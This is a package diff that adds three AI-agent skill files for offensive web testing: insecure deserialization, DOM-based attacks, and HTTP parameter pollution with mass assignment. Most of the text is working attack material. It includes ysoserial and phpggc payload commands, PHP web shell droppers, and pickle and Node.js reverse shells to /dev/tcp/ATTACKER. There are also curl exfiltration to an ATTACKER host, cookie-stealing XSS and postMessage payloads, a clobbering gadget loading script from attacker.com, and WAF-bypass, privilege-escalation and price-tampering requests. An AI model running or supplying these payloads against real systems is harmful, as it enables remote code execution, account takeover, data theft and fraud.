rtexit-method 0.1.7 → 0.1.9

package/packaged-assets/.agents/skills/rt-deserialization/SKILL.md

@@ -0,0 +1,223 @@
+---
+name: rt-deserialization
+description: "Insecure deserialization master skill covering all major languages for authorized engagements. Java deserialization with ysoserial gadget chains, PHP object injection with phpggc, .NET ViewState and BinaryFormatter attacks, Python pickle RCE, Ruby Marshal deserialization, Node.js serialize-to-function, and identifying deserialization sinks across frameworks. Use when applications accept serialized objects from untrusted input."
+---
+
+# rt-deserialization — Insecure Deserialization (All Languages)
+
+## Overview
+
+Deserialization converts byte streams back into objects. When applications deserialize attacker-controlled data without validation, attackers can craft malicious serialized objects that trigger code execution via "gadget chains" — sequences of existing code that execute dangerous operations during deserialization.
+
+---
+
+## Phase 1 — Detection Across Languages
+
+```bash
+# Java serialization magic bytes
+# AC ED 00 05 = Java serialized object
+# rO0AB = base64 of AC ED 00 05
+echo "rO0ABXNy..." | base64 -d | xxd | head -2
+
+# PHP serialization format
+# O:4:"User":1:{s:4:"name";s:5:"admin";}
+# a:2:{s:5:"hello";s:5:"world";}
+
+# .NET BinaryFormatter
+# AAEAAAD///// = base64 marker
+# Content-Type: application/x-www-form-urlencoded with ViewState param
+
+# Python pickle
+# \x80\x04 = pickle protocol 4 magic bytes
+
+# Node.js (serialize-javascript, node-serialize)
+# {"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('id')}()"}
+```
+
+---
+
+## Phase 2 — Java Deserialization
+
+```bash
+# ysoserial — Java gadget chain generator
+java -jar ysoserial.jar  # List available gadget chains
+
+# Most useful chains
+java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0
+java -jar ysoserial.jar CommonsCollections5 'curl http://ATTACKER/$(id)' | base64 -w0
+java -jar ysoserial.jar Spring1 'id' | base64 -w0
+java -jar ysoserial.jar Groovy1 'id' | base64 -w0
+
+# Test with curl — replace serialized value in cookie/header/body
+PAYLOAD=$(java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0)
+curl "https://target.com/api" \
+  -H "Authorization: $PAYLOAD"
+  # Or in cookie: -b "JSESSIONID=$PAYLOAD"
+  # Or POST body with base64 encoded payload
+
+# Blind RCE via DNS (confirm execution)
+java -jar ysoserial.jar CommonsCollections6 \
+  'curl http://BURP_COLLABORATOR.burpcollaborator.net' | base64 -w0
+
+# Identify gadget chain — check classpath
+# Look for: commons-collections, spring-core, groovy-all in pom.xml/build.gradle
+find /app -name "*.jar" | xargs -I{} jar tf {} | grep -i "commons\|spring"
+```
+
+---
+
+## Phase 3 — PHP Object Injection
+
+```bash
+# phpggc — PHP gadget chain generator (like ysoserial for PHP)
+git clone https://github.com/ambionics/phpggc
+php phpggc -l  # List gadget chains
+
+# Useful chains
+php phpggc Laravel/RCE1 system id | base64
+php phpggc Symfony/RCE4 exec 'id' | base64
+php phpggc Drupal/FD1 file_put_contents /var/www/html/shell.php '<?php system($_GET[c]);?>'
+php phpggc Guzzle/FW1 file_put_contents /var/www/html/shell.php '<?php system($_GET[c]);?>'
+
+# Manual PHP object injection
+# Find unserialize() calls with user input:
+# unserialize($_COOKIE['data'])
+# unserialize(base64_decode($_GET['obj']))
+
+# Craft malicious object (if __wakeup, __destruct, __toString with dangerous code)
+php -r "
+class VulnClass {
+    public \$cmd;
+    function __destruct() { system(\$this->cmd); }
+}
+\$o = new VulnClass();
+\$o->cmd = 'id';
+echo base64_encode(serialize(\$o));
+"
+
+# Phar deserialization (file operations trigger deserialization)
+php -r "
+\$phar = new Phar('evil.phar');
+\$phar->startBuffering();
+\$phar->addFromString('test.txt', 'test');
+\$phar->setMetadata(new VulnClass());
+\$phar->stopBuffering();
+"
+rename('evil.phar', 'evil.jpg')  # Rename to bypass extension check
+# Trigger: file_exists('phar://uploads/evil.jpg')
+```
+
+---
+
+## Phase 4 — Python Pickle RCE
+
+```python
+# Pickle deserialization = arbitrary code execution
+import pickle, base64, os
+
+class Exploit(object):
+    def __reduce__(self):
+        return (os.system, ('id',))
+
+# Generate payload
+payload = base64.b64encode(pickle.dumps(Exploit())).decode()
+print(f"Payload: {payload}")
+
+# Reverse shell payload
+class ReverseShell(object):
+    def __reduce__(self):
+        cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'"
+        return (os.system, (cmd,))
+
+payload = base64.b64encode(pickle.dumps(ReverseShell())).decode()
+
+# Test if endpoint accepts pickle
+import requests
+r = requests.post("https://target.com/api/data",
+                  data={"data": payload})
+# Or in cookie, header, etc.
+```
+
+---
+
+## Phase 5 — .NET Deserialization
+
+```bash
+# ysoserial.net — .NET gadget chains
+ysoserial.net -f Json.Net -g ObjectDataProvider -c "calc.exe" -o base64
+ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c "cmd /c whoami" -o base64
+ysoserial.net -f LosFormatter -g ActivitySurrogateSelectorFromFile -c "payload.cs" -o base64
+
+# ViewState deserialization (ASP.NET WebForms)
+# If MachineKey known/weak → forge ViewState with payload
+ysoserial.net -p ViewState -g TextFormattingRunProperties \
+  --decryptionalg="AES" --decryptionkey="KEY_FROM_WEB.CONFIG" \
+  --validationalg="SHA1" --validationkey="VKEY_FROM_WEB.CONFIG" \
+  -c "cmd /c whoami" -o base64
+
+# Locate MachineKey in web.config
+curl https://target.com/.git/config  # Maybe web.config exposed
+# Or: read via LFI/XXE
+```
+
+---
+
+## Phase 6 — Ruby Marshal Deserialization
+
+```ruby
+# Marshal.load with user input = RCE
+require 'base64'
+
+# Gadget chain for Ruby on Rails with universal_gadget
+# Tool: rails-deserialization-exploits
+# github.com/Ren0503/ruby-deserialization
+
+payload = Base64.encode64(Marshal.dump(
+  # Construct gadget chain here
+))
+
+# Test if endpoint accepts Marshal data
+# Look for: application/x-ruby-marshal content-type
+# Or: base64 strings starting with BAhb (Ruby Marshal magic)
+```
+
+---
+
+## Phase 7 — Node.js Deserialization
+
+```javascript
+// node-serialize vulnerable pattern
+var serialize = require('node-serialize');
+
+// Malicious serialized object with IIFE
+var payload = '{"rce":"_$$ND_FUNC$$_function(){return require(\'child_process\').execSync(\'id\').toString()}()"}';
+
+// Test: encode and send
+var encoded = Buffer.from(payload).toString('base64');
+// Send in cookie or POST body
+
+// Reverse shell
+var revshell = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'bash -c \\\\\'bash -i >& /dev/tcp/ATTACKER/4444 0>&1\\\\\'\')}()"}';
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Identify serialization format (magic bytes) · ysoserial DNS callback confirmation · phpggc basic chain
+
+**INTERMEDIATE:** Java CommonsCollections chains · PHP phar deserialization · Python pickle RCE
+
+**ADVANCED:** .NET ViewState with known MachineKey · Ruby Rails gadget chains · Blind RCE confirmation via DNS
+
+**EXPERT:** Custom gadget chain development · Cross-language polyglot payloads · JNDI injection variants
+
+---
+
+## References
+
+- ysoserial: https://github.com/frohoff/ysoserial
+- phpggc: https://github.com/ambionics/phpggc
+- ysoserial.net: https://github.com/pwntester/ysoserial.net
+- OWASP Deserialization: https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data
+- MITRE T1059: https://attack.mitre.org/techniques/T1059/

package/packaged-assets/.agents/skills/rt-dom-attacks/SKILL.md

@@ -0,0 +1,219 @@
+---
+name: rt-dom-attacks
+description: "DOM-based vulnerability skill for authorized engagements. DOM XSS via dangerous sinks (innerHTML, eval, document.write, location), DOM clobbering to bypass security checks, client-side template injection (AngularJS, Vue, React), postMessage exploitation, DOM-based open redirect, and web messaging attacks. Use when testing client-side JavaScript security in modern single-page applications."
+---
+
+# rt-dom-attacks — DOM-Based Vulnerabilities
+
+## Overview
+
+DOM-based vulnerabilities occur entirely client-side — the server sends safe data but the browser's JavaScript processes it unsafely. Traditional XSS scanners miss these. Sources (user-controlled input) flow into dangerous sinks (functions that execute code) through JavaScript execution paths.
+
+---
+
+## Phase 1 — DOM XSS Sources & Sinks
+
+```javascript
+// SOURCES (attacker-controlled inputs)
+location.href          // Full URL
+location.search        // Query string (?q=...)
+location.hash          // Fragment (#...)
+location.pathname      // URL path
+document.referrer      // Referrer header
+window.name            // Window name (survives navigation!)
+postMessage data       // Cross-origin messages
+localStorage/sessionStorage
+
+// SINKS (dangerous functions — cause XSS if tainted data flows in)
+// CODE EXECUTION sinks
+eval()
+setTimeout("STRING")    // String form — dangerous
+setInterval("STRING")
+new Function("STRING")
+document.write()
+document.writeln()
+
+// HTML INJECTION sinks
+element.innerHTML = TAINTED
+element.outerHTML = TAINTED
+element.insertAdjacentHTML()
+document.body.innerHTML
+
+// URL NAVIGATION sinks (can be javascript: protocol)
+location = TAINTED
+location.href = TAINTED
+location.assign(TAINTED)
+location.replace(TAINTED)
+
+// Script SRC sinks
+script.src = TAINTED
+```
+
+---
+
+## Phase 2 — DOM XSS Examples
+
+```javascript
+// URL fragment → innerHTML (common in SPA routing)
+// Source: location.hash
+// Sink: innerHTML
+// Vulnerable code: document.getElementById('content').innerHTML = location.hash.slice(1)
+// Exploit: https://target.com/#<img src=x onerror=alert(1)>
+
+// URL param → eval
+// Vulnerable: eval(new URLSearchParams(location.search).get('callback'))
+// Exploit: https://target.com/?callback=alert(document.cookie)
+
+// URL param → document.write
+// Vulnerable: document.write('<img src="' + getParam('img') + '">')
+// Exploit: https://target.com/?img=x" onerror="alert(1)
+
+// URL param → location (open redirect → XSS)
+// Vulnerable: location.href = getParam('redirect')
+// Exploit: https://target.com/?redirect=javascript:alert(1)
+
+// window.name XSS (survives cross-origin navigation)
+// Attacker page:
+window.name = "<img src=x onerror=alert(document.cookie)>"
+location = "https://target.com/vulnerable-page"
+// Target page uses: document.write(window.name)
+```
+
+---
+
+## Phase 3 — DOM Clobbering
+
+```html
+<!-- DOM clobbering: use HTML to override JavaScript variables/objects -->
+<!-- Overwrites window.x with a DOM element -->
+<a id="x">clobbered</a>
+<!-- Now: window.x = HTMLAnchorElement (not undefined) -->
+<!-- If code does: if(!x) { securityCheck() } → check bypassed -->
+
+<!-- Clobber security flag -->
+<form id="isAdmin"><input id="value" value="true"></form>
+<!-- If code: if(isAdmin.value === 'true') → bypassed -->
+
+<!-- Clobber URL used in script src -->
+<a id="config"><a id="config" name="scriptURL" href="//attacker.com/evil.js"></a>
+<!-- If code: script.src = config.scriptURL → loads attacker script -->
+
+<!-- Real attack: inject via stored XSS on subdomain, clobber parent -->
+<!-- Or: HTML injection without script execution (CSP bypass) -->
+```
+
+---
+
+## Phase 4 — Client-Side Template Injection (CSTI)
+
+```javascript
+// AngularJS CSTI → RCE in browser sandbox
+// If user input is placed inside ng-app context:
+// Test: {{7*7}} → if 49 appears → CSTI
+
+// AngularJS sandbox escape (old versions)
+{{constructor.constructor('alert(1)')()}}
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+
+// AngularJS 1.x universal sandbox escape
+{{a=['constructor'][0];b=a.constructor;c=b('return window')();c.alert(c.document.cookie)}}
+
+// Vue.js CSTI
+// Test: {{7*7}}
+// {{constructor.constructor('alert(1)')()}}
+// $el.ownerDocument.defaultView.alert(1)
+
+// React: generally safe (JSX escapes) but dangerouslySetInnerHTML is a sink
+// Test for dangerouslySetInnerHTML in source → same as innerHTML
+
+// Angular (modern) — strict mode, harder to exploit
+// Look for: bypassSecurityTrustHtml(), sanitize bypass
+```
+
+---
+
+## Phase 5 — postMessage Exploitation
+
+```javascript
+// postMessage allows cross-origin communication
+// Vulnerable: doesn't validate origin of incoming messages
+
+// Vulnerable code:
+window.addEventListener("message", function(e) {
+    eval(e.data);  // No origin check!
+    // Or: document.getElementById("content").innerHTML = e.data
+});
+
+// Exploit from attacker.com:
+<script>
+var target = window.open("https://target.com/", "_blank");
+setTimeout(function() {
+    target.postMessage("<img src=x onerror=alert(document.cookie)>", "*");
+    // Or: target.postMessage("alert(1)", "*");
+}, 2000);
+</script>
+
+// Bypass origin check weaknesses
+// if (e.origin.indexOf("target.com") !== -1) ← bypass with: attacker.target.com
+// if (e.origin === "https://target.com")       ← strict (safe)
+
+// postMessage CSRF
+target.postMessage('{"action":"transfer","amount":1000,"to":"attacker"}', "*")
+```
+
+---
+
+## Phase 6 — DOM-Based Open Redirect
+
+```bash
+# DOM redirect used as XSS vector
+# Vulnerable: window.location = getParam('url')
+# XSS: ?url=javascript:alert(document.cookie)
+
+# Bypass common filters
+?url=javascript:alert(1)
+?url=JaVaScRiPt:alert(1)        # Case variation
+?url=javascript%3aalert(1)       # URL encoded colon
+?url=java%0ascript:alert(1)     # Newline injection
+?url=data:text/html,<script>alert(1)</script>
+?url=//attacker.com              # Protocol-relative
+```
+
+---
+
+## Automated DOM XSS Testing
+
+```bash
+# DOMXSSScanner
+pip3 install dalfox
+dalfox url "https://target.com/?q=test" --deep-domxss
+
+# DOM Invader (Burp Suite built-in)
+# Browser → Extensions → Burp Suite → DOM Invader
+# Injects canary string → tracks through DOM → finds sinks
+
+# Playwright-based DOM XSS scanner
+npm install -g js-xss-scanner
+js-xss-scanner https://target.com
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** URL fragment/parameter to innerHTML · document.write XSS · Open redirect via location=
+
+**INTERMEDIATE:** DOM clobbering for security bypass · AngularJS CSTI sandbox escape · postMessage origin bypass
+
+**ADVANCED:** window.name persistence XSS · Vue.js CSTI · Complex source-to-sink tracing
+
+**EXPERT:** Custom DOM analysis tooling · React dangerouslySetInnerHTML chains · CSP bypass via DOM
+
+---
+
+## References
+
+- PortSwigger DOM XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
+- DOM Invader: https://portswigger.net/burp/documentation/desktop/tools/dom-invader
+- PortSwigger DOM Clobbering: https://portswigger.net/web-security/dom-based/dom-clobbering
+- Client-side PP gadgets: https://github.com/BlackFan/client-side-prototype-pollution

package/packaged-assets/.agents/skills/rt-http-parameter-pollution/SKILL.md

@@ -0,0 +1,187 @@
+---
+name: rt-http-parameter-pollution
+description: "HTTP Parameter Pollution, mass assignment, and parameter tampering skill for authorized engagements. HPP to bypass WAF/filters, duplicate parameter behavior across frameworks, mass assignment in REST APIs (adding role/admin fields), hidden parameter discovery, parameter type juggling, array injection, and JSON property injection. Use when testing how applications handle unexpected or duplicate parameters."
+---
+
+# rt-http-parameter-pollution — HTTP Parameter Pollution & Mass Assignment
+
+## Overview
+
+Parameter pollution attacks exploit how applications handle unexpected, duplicate, or extra parameters. Different frameworks handle duplicate parameters differently — what the WAF sees vs what the app sees differs, enabling filter bypass and unauthorized data injection.
+
+---
+
+## Phase 1 — HTTP Parameter Pollution (HPP)
+
+```bash
+# Different frameworks handle duplicate params differently:
+# PHP:          last value wins  → ?a=1&a=2 → a=2
+# ASP.NET:      first value wins → ?a=1&a=2 → a=1
+# ASP.NET MVC:  comma-joined     → ?a=1&a=2 → a=1,2
+# Node/Express: array            → ?a=1&a=2 → a=['1','2']
+# Flask/Python: first value      → ?a=1&a=2 → a=1
+
+# WAF bypass: split attack payload across duplicate params
+# WAF sees: a=SEL and a=ECT * → not 'SELECT *' → passes
+# Server concatenates: a=SELECT * → SQLi executes
+curl "https://target.com/search?q=SEL&q=ECT+*+FROM+users"
+curl "https://target.com/search?q=<scr&q=ipt>alert(1)</script>"
+
+# Auth bypass via duplicate params
+# If app checks first param but uses second:
+curl "https://target.com/api?admin=false&admin=true"
+
+# Test HPP behavior
+for val in "1&param=2" "1%26param=2" "1;param=2"; do
+  curl "https://target.com/api?param=$val" -v
+done
+```
+
+---
+
+## Phase 2 — Mass Assignment
+
+```bash
+# REST APIs that bind request body to model objects
+# If model has admin/role field not exposed in docs → inject it
+
+# Registration with role escalation
+curl -X POST https://target.com/api/register \
+  -H "Content-Type: application/json" \
+  -d '{"username":"attacker","password":"pass","role":"admin"}'
+
+# Profile update with hidden fields
+curl -X PUT https://target.com/api/user/profile \
+  -H "Content-Type: application/json" \
+  -d '{"name":"test","isAdmin":true,"verified":true,"credits":99999}'
+
+# Common hidden fields to try
+# role, roles, isAdmin, admin, superuser, verified, active
+# credits, balance, quota, tier, plan
+# permissions, scopes, groups
+# created_at, updated_at (override timestamps)
+# password_confirmation (skip validation)
+
+# Parameter guessing from error messages
+# Send request → error reveals model field names
+curl -X POST https://target.com/api/register \
+  -d '{"invalid_field": "value"}'
+# Error: "Unknown field 'invalid_field'. Known fields: username, password, email, role, isActive"
+# → role and isActive are valid fields!
+
+# GraphQL mass assignment
+# Mutations often accept more fields than documented
+curl -X POST https://target.com/graphql \
+  -d '{"query":"mutation{updateUser(id:1,input:{name:\"x\",role:\"admin\",isAdmin:true}){id name role}}"}'
+```
+
+---
+
+## Phase 3 — Array & JSON Injection
+
+```bash
+# Array injection when server expects single value
+# Normal: ?id=1
+# Array: ?id[]=1&id[]=2 → may access records 1 AND 2
+
+# PHP array injection
+curl "https://target.com/delete?id[]=1&id[]=2&id[]=999"  # Delete multiple records
+curl "https://target.com/api?role[]=user&role[]=admin"   # Multiple roles
+
+# JSON type confusion
+# Server expects string, send array/object
+curl -X POST https://target.com/api/login \
+  -d '{"username":{"$ne":""},"password":{"$ne":""}}'    # MongoDB NoSQL injection
+
+# Type juggling (PHP loose comparison)
+# md5('240610708') == md5('QNKCDZO') → both start with "0e"
+# PHP treats 0e... as scientific notation → both = 0 → equal!
+curl -X POST https://target.com/login \
+  -d "password=240610708"  # If stored hash is md5('QNKCDZO') → login bypass
+
+# JSON number vs string
+curl -X POST https://target.com/api \
+  -d '{"id": "1 OR 1=1"}'     # String — possible SQLi
+curl -X POST https://target.com/api \
+  -d '{"id": 9999999999}'      # Large int — integer overflow
+curl -X POST https://target.com/api \
+  -d '{"id": null}'            # Null — bypass null check
+curl -X POST https://target.com/api \
+  -d '{"id": true}'            # Boolean — type confusion
+```
+
+---
+
+## Phase 4 — Hidden Parameter Discovery
+
+```bash
+# Param Miner (Burp extension) — automated hidden param discovery
+# Active Scan → Param Miner → "Guess params"
+# Tests thousands of potential parameter names
+
+# Manual — common hidden params
+hidden_params=(
+  "debug" "test" "admin" "internal" "dev"
+  "callback" "redirect" "return" "next" "url"
+  "format" "output" "type" "action" "method"
+  "id" "user_id" "account_id" "token" "key"
+  "override" "bypass" "force" "unsafe"
+)
+
+for param in "${hidden_params[@]}"; do
+  response=$(curl -s "https://target.com/api?$param=true" -w "%{http_code}")
+  echo "$param: ${response: -3}"
+done
+
+# Source code mining for hidden params
+# Extract from JavaScript files
+grep -rE "params\[|req\.query\.|request\.args\.|request\.GET\[" *.js *.py *.rb
+linkfinder -i https://target.com -d  # Extract endpoints + params from JS
+```
+
+---
+
+## Phase 5 — Parameter Tampering
+
+```bash
+# Modify parameters that appear fixed/uneditable in UI
+
+# Hidden form fields
+curl -X POST https://target.com/checkout \
+  -d "product_id=1&price=0.01&quantity=1"  # Change price
+
+# JWT claims tampering (see also rt-exploit-jwt)
+# Encoded params in cookies
+# Base64 decode → modify → re-encode
+echo "dXNlcjoxMjM=" | base64 -d  # user:123
+echo -n "user:1" | base64  # → dXNlcjox → change to user 1
+
+# IDOR via parameter change
+GET /api/invoice/download?id=12345  →  id=12344, id=12346
+
+# Price in Base64 (some carts encode price server-side)
+# Decode → modify → encode → submit
+echo "cHJpY2U9MTAwMC4wMA==" | base64 -d  # price=1000.00
+echo -n "price=0.01" | base64 | curl -X POST ... -d "data=BASE64"
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Mass assignment with admin/role fields · HPP with duplicate params · Array injection
+
+**INTERMEDIATE:** WAF bypass via HPP splitting · Hidden parameter discovery with Param Miner · JSON type confusion
+
+**ADVANCED:** PHP type juggling exploit · Complex mass assignment via nested objects · Parameter precedence abuse
+
+**EXPERT:** Framework-specific HPP behavior chains · Custom parameter pollution for specific filter bypass
+
+---
+
+## References
+
+- PortSwigger Mass Assignment: https://portswigger.net/web-security/api-testing/mass-assignment-vulnerabilities  
+- HPP research: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution
+- Param Miner: https://github.com/PortSwigger/param-miner
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/